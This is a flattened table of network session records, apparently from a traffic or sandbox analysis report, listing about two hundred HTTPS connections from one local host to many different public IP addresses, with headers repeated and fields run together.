                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18190192.168.2.1434334179.101.94.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18191192.168.2.1441948188.68.64.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18192192.168.2.1445372160.126.39.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18193192.168.2.143709879.3.197.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18194192.168.2.146029639.99.126.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18195192.168.2.1437240103.203.206.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18196192.168.2.1449710168.174.227.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18197192.168.2.1452678192.225.166.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18198192.168.2.1450832118.31.110.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18199192.168.2.1460598125.251.233.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18200192.168.2.1460076166.11.64.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18201192.168.2.1443786123.193.42.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18202192.168.2.145666646.122.183.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18203192.168.2.1433770219.99.147.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18204192.168.2.144462292.193.141.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18205192.168.2.1433440182.238.170.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18206192.168.2.1460622217.220.46.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18207192.168.2.145493631.67.127.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18208192.168.2.144466080.144.148.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18209192.168.2.1454882168.241.126.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18210192.168.2.14389608.110.63.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18211192.168.2.143697275.120.195.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18212192.168.2.145152825.108.90.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18213192.168.2.1446628125.66.66.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18214192.168.2.145557469.117.112.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18215192.168.2.145685064.119.34.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18216192.168.2.1437546186.35.132.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18217192.168.2.143921012.23.115.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18218192.168.2.143886076.223.216.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18219192.168.2.145802067.171.1.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18220192.168.2.145143061.26.96.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18221192.168.2.1460814205.247.56.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18222192.168.2.1438410122.46.187.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18223192.168.2.145640869.29.2.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18224192.168.2.1454028147.191.46.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18225192.168.2.1451554196.158.12.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18226192.168.2.1456132168.99.183.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18227192.168.2.145272432.37.184.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18228192.168.2.145182668.118.63.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18229192.168.2.1448208219.65.153.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18230192.168.2.1448192219.174.121.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18231192.168.2.1437032105.227.162.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18232192.168.2.145141088.132.21.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18233192.168.2.1435254136.56.157.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18234192.168.2.145990239.125.135.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18235192.168.2.1434552191.12.69.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18236192.168.2.145498843.105.137.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18237192.168.2.1436356172.174.235.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18238192.168.2.1451408221.77.203.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18239192.168.2.14365541.104.37.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18240192.168.2.143379044.103.151.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18241192.168.2.1451138201.146.239.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18242192.168.2.1435982107.169.253.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18243192.168.2.1450226200.224.128.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18244192.168.2.144348295.188.110.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18245192.168.2.1443642168.73.35.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18246192.168.2.1440200166.97.180.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18247192.168.2.143571848.195.155.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18248192.168.2.145368650.34.87.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18249192.168.2.1445044198.7.16.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18250192.168.2.1445346141.46.52.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18251192.168.2.146055665.91.7.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18252192.168.2.143519287.63.52.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18253192.168.2.145065645.214.186.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18254192.168.2.143981071.32.241.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18255192.168.2.144992699.207.183.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18256192.168.2.1456840186.253.193.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18257192.168.2.143451697.172.144.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18258192.168.2.1442064138.168.82.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18259192.168.2.145726613.181.125.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18260192.168.2.1444456121.233.47.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18261192.168.2.1446802219.167.164.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18262192.168.2.1447496210.139.232.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18263192.168.2.1439678195.168.248.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18264192.168.2.1446048193.170.43.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18265192.168.2.1460358199.51.181.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18266192.168.2.1458314104.151.23.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18267192.168.2.1459290149.58.78.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18268192.168.2.1444238159.204.76.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18269192.168.2.146039078.163.208.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18270192.168.2.144410266.41.33.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18271192.168.2.1455804207.43.213.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18272192.168.2.1446188223.173.79.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18273192.168.2.14379769.114.237.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18274192.168.2.1441218113.40.230.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18275192.168.2.1460502146.20.215.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18276192.168.2.1448708161.115.225.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18277192.168.2.1452574221.28.232.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18278192.168.2.1452774124.134.24.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18279192.168.2.1438332185.124.81.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18280192.168.2.1440720213.56.61.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18281192.168.2.1444852194.109.140.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18282192.168.2.144184263.195.119.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18283192.168.2.1441932162.92.130.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18284192.168.2.144346097.79.34.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18285192.168.2.1441524142.78.109.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18286192.168.2.143612469.60.29.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18287192.168.2.144825074.192.155.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18288192.168.2.144178493.115.116.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18289192.168.2.1437564143.19.80.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18290192.168.2.1434730196.17.140.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18291192.168.2.14450248.99.128.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18292192.168.2.1448674207.75.245.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18293192.168.2.145905645.13.163.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18294192.168.2.1435290124.161.16.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18295192.168.2.1458682157.94.192.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18296192.168.2.1454852142.98.15.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18297192.168.2.1439618163.93.250.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18298192.168.2.145273285.204.196.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18299192.168.2.143481627.54.17.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18300192.168.2.1438874151.235.17.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18301192.168.2.1447418219.58.215.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18302192.168.2.1454406217.73.41.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18303192.168.2.1447140126.69.142.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18304192.168.2.144233670.18.66.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18305192.168.2.1452552114.68.224.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18306192.168.2.143294231.66.45.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18307192.168.2.14584304.188.133.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18308192.168.2.1437188168.128.28.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18309192.168.2.1457628201.0.136.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18310192.168.2.145998450.229.9.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18311192.168.2.1456118118.196.236.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18312192.168.2.145777046.253.107.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18313192.168.2.1434212207.38.18.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18314192.168.2.145804091.7.128.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18315192.168.2.1442526149.250.137.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18316192.168.2.1443104211.41.45.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18317192.168.2.1451690156.174.27.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18318192.168.2.1456062159.120.52.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18319192.168.2.1437468137.73.234.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18320192.168.2.1440562156.71.238.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18321192.168.2.1458484217.64.140.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18322192.168.2.144430687.171.41.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18323192.168.2.1454602190.129.232.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18324192.168.2.1452606102.24.54.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18325192.168.2.1441456146.97.32.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18326192.168.2.1443184101.194.244.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18327192.168.2.143850851.3.80.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18328192.168.2.1437632192.161.104.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18329192.168.2.144518288.76.8.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18330192.168.2.1446602149.114.103.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18331192.168.2.143421419.214.197.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18332192.168.2.1453422219.21.206.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18333192.168.2.145359697.54.57.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18334192.168.2.1449522145.0.168.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18335192.168.2.1439000114.9.104.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18336192.168.2.144268490.46.25.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18337192.168.2.1460454189.24.106.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18338192.168.2.143632083.27.24.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18339192.168.2.144221283.236.82.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18340192.168.2.1443980147.31.78.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18341192.168.2.1453482202.236.108.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18342192.168.2.1439450153.142.80.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18343192.168.2.1433450138.90.116.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18344192.168.2.1440146165.243.115.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18345192.168.2.1433934129.137.144.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18346192.168.2.144234824.126.246.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18347192.168.2.1457328169.106.231.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18348192.168.2.1449410146.1.25.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18349192.168.2.1439524188.63.198.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18350192.168.2.144394874.239.148.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18351192.168.2.1437068187.245.40.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18352192.168.2.1449892130.226.235.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18353192.168.2.1446738202.84.252.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18354192.168.2.143994886.140.154.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18355192.168.2.145293890.4.22.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18356192.168.2.1449892112.160.98.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18357192.168.2.1442682150.63.203.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18358192.168.2.145920258.64.170.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18359192.168.2.143761641.98.106.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18360192.168.2.1450572194.224.12.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18361192.168.2.1444562123.127.253.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18362192.168.2.1440374187.106.32.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18363192.168.2.144431689.79.93.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18364192.168.2.1451532101.112.66.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18365192.168.2.145342263.37.148.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18366192.168.2.1445404115.208.206.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18367192.168.2.144299459.22.223.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18368192.168.2.1457964105.245.155.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18369192.168.2.1436246166.71.138.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18370192.168.2.144581040.64.84.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18371192.168.2.145805835.43.6.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18372192.168.2.1450092209.31.254.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18373192.168.2.1440238162.55.205.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18374192.168.2.1450302168.236.56.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18375192.168.2.1441198176.131.230.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18376192.168.2.143288682.38.169.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18377192.168.2.1457496169.197.77.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18378192.168.2.1460098159.147.10.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18379192.168.2.1455404139.212.197.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18380192.168.2.1449548137.147.46.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18381192.168.2.1438746190.28.150.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18382192.168.2.1448044144.96.79.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18383192.168.2.1437320172.251.224.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18384192.168.2.145836083.46.213.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18385192.168.2.144241614.109.124.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18386192.168.2.1437100139.44.114.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18387192.168.2.1460438119.151.217.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18388192.168.2.1435294115.70.232.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18389192.168.2.1440868210.33.116.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18390192.168.2.1453148136.87.57.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18391192.168.2.1435926205.116.29.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18392192.168.2.1459330111.62.244.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18393192.168.2.1438050213.250.195.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18394192.168.2.1443698106.127.200.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18395192.168.2.1448752121.225.181.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18396192.168.2.1446424149.152.184.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18397192.168.2.145919496.141.62.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18398192.168.2.1438630116.6.248.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18399192.168.2.143486263.136.45.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18400192.168.2.1458040158.53.26.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18401192.168.2.1435322162.18.221.243443
                                                        TimestampBytes transferredDirectionData


